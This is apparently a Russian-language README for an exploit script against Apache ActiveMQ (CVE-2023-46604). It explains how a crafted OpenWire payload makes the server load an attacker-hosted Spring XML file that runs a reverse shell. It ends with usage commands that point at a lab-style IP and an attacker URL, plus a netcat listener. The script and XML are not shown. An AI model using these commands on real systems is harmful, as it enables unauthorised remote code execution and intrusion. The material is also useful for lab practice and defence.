
Скрипт эксплуатирует уязвимость небезопасной десериализации в Apache ActiveMQ (CVE-2023-46604)
Техническое описание атаки: CVE-2023-46604
Скрипт эксплуатирует уязвимость небезопасной десериализации в Apache ActiveMQ (CVE-2023-46604) для достижения удаленного выполнения кода на целевом сервере. Описание процесса эксплуатации
Цель уязвимости:
Уязвимость находится в протоколе OpenWire Apache ActiveMQ.
Она позволяет небезопасную десериализацию объектов, что может быть использовано для выполнения произвольного кода на сервере.
Предварительные требования:
Сетевой доступ к серверу ActiveMQ.
Вредоносный XML-файл (poc.xml), доступный по URL, который может быть достигнут целевым сервером.
Компоненты атаки:
Python-скрипт: автоматизирует отправку вредоносной полезной нагрузки на сервер ActiveMQ.
XML-файл (poc.xml): содержит Spring-бин, определяющий выполнение вредоносной команды (например, открытие обратной оболочки).
Шаги атаки
Подготовка полезной нагрузки:
Скрипт создает сообщение в шестнадцатеричном формате, которое включает:
Имя Java-класса: org.springframework.context.support.ClassPathXmlApplicationContext.
URL вредоносного XML-файла.
Полезная нагрузка преобразуется в последовательность байтов, которая может быть отправлена через протокол OpenWire.
Отправка полезной нагрузки:
Скрипт открывает TCP-сокетное соединение с сервером ActiveMQ на указанном порту (по умолчанию 61616).
Отправляет вредоносную полезную нагрузку на сервер.
Выполнение вредоносного кода:
Сервер ActiveMQ десериализует объект, указанный в полезной нагрузке.
Из-за небезопасной десериализации загружается и выполняется Spring-бин, определенный в XML-файле.
Этот бин выполняет вредоносную команду (например, обратную оболочку) на сервере.
_________________________________________________________
пример выполнения:
python3 CVE-2023-46604.py -i 10.10.11.243 -u http://10.10.16.2/poc.xml
nc -lvnp 9001
этот скрипт был скопирован и модифицирован на испанском:https://github.com/evkl1d/CVE-2023-46604.git